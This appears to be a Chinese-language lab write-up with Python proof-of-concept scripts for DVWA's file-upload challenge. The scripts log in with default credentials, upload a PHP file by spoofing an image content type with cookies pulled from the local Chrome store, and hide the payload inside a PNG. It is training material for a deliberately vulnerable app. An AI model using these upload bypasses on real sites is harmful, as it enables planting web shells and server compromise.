POC——DVWA‘s File Upload
苍嘉澍
Level——low
最近了解了一下python的selenium,干脆用它写一个low级别的POC吧~
from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support.select import Select
import time
driver = Chrome()
driver.get("http://192.168.117.130/DVWA-1.9/login.php")
WebDriverWait(driver,10).until(lambda d:"Login" in d.title)
driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/p/input').click()
driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/select').click()
loc = (By.XPATH,'//*[@id="main_body"]/div/form/select')
ele = driver.find_element(*loc)
s = Select(ele)
s.select_by_value("low")
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/input[1]').click()
driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[2]').send_keys('/path/one.php')
driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[3]').click()
response = driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/pre')
re = 'one.php'
flag=re in str(response.text)
if flag:
print("It looks likely vulnerable")
else:
print("It is strong")
driver.close()Level-Medium
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import browser_cookie3
cookie = browser_cookie3.chrome()
URL = 'http://192.168.117.130/DVWA-1.9/vulnerabilities/upload/'
fl = open("one.php","rb")
m = MultipartEncoder(
fields={'MAX_FILE_SIZE': '100000',
'uploaded': ('one.php',fl,'image/png'),
'Upload': 'Upload'
})
headers = {
"Content-Type": m.content_type
}
response = requests.post(URL, data=m, headers=headers,cookies=cookie)
re = 'one.php'
flag=re in str(response.content)
if flag:
print("It looks likely vulnerable")
else:
print("It is strong")另:之前在这里遇到了不少问题,单单是处理这些问题就花费了好长时间,现在记录一下:
- 此处浏览器的Content-Type是multipart/form-data,这个类型很有意思也很有特点,post传参形式没有变,只是把“data:vlaue”形式变成了一串随机生成的遗传字符串作为分隔符,分隔符内定义了各种参数以及文件内容的二进制,所以构造post请求的时候需要用到多文件上传(MultipartEncoder)的包(也有别的方法,为了以后方便,这里就用了这个),链接放在这里;
- 看到网上有很多multipart/form-data类型上传文件时,都用到了token这个值,但是我没有从我的抓取到的包中找到,网上查了一下,可能是DVWA没有定义token这个键值,不过同样是身份验证的话,cookie也有相同作用,cookie、session、token区别放在这里;
- request请求数据后,会自动进行url编码
Level-High
这里就是多加了一个cmd下copy one.png /b + one.txt /a two.png的图片隐写过程(因为high级别对文件大小进行了限制),然后将新的到的two.png传入。这个涉及到后面的文件包含,这里就不写了~
类似资料: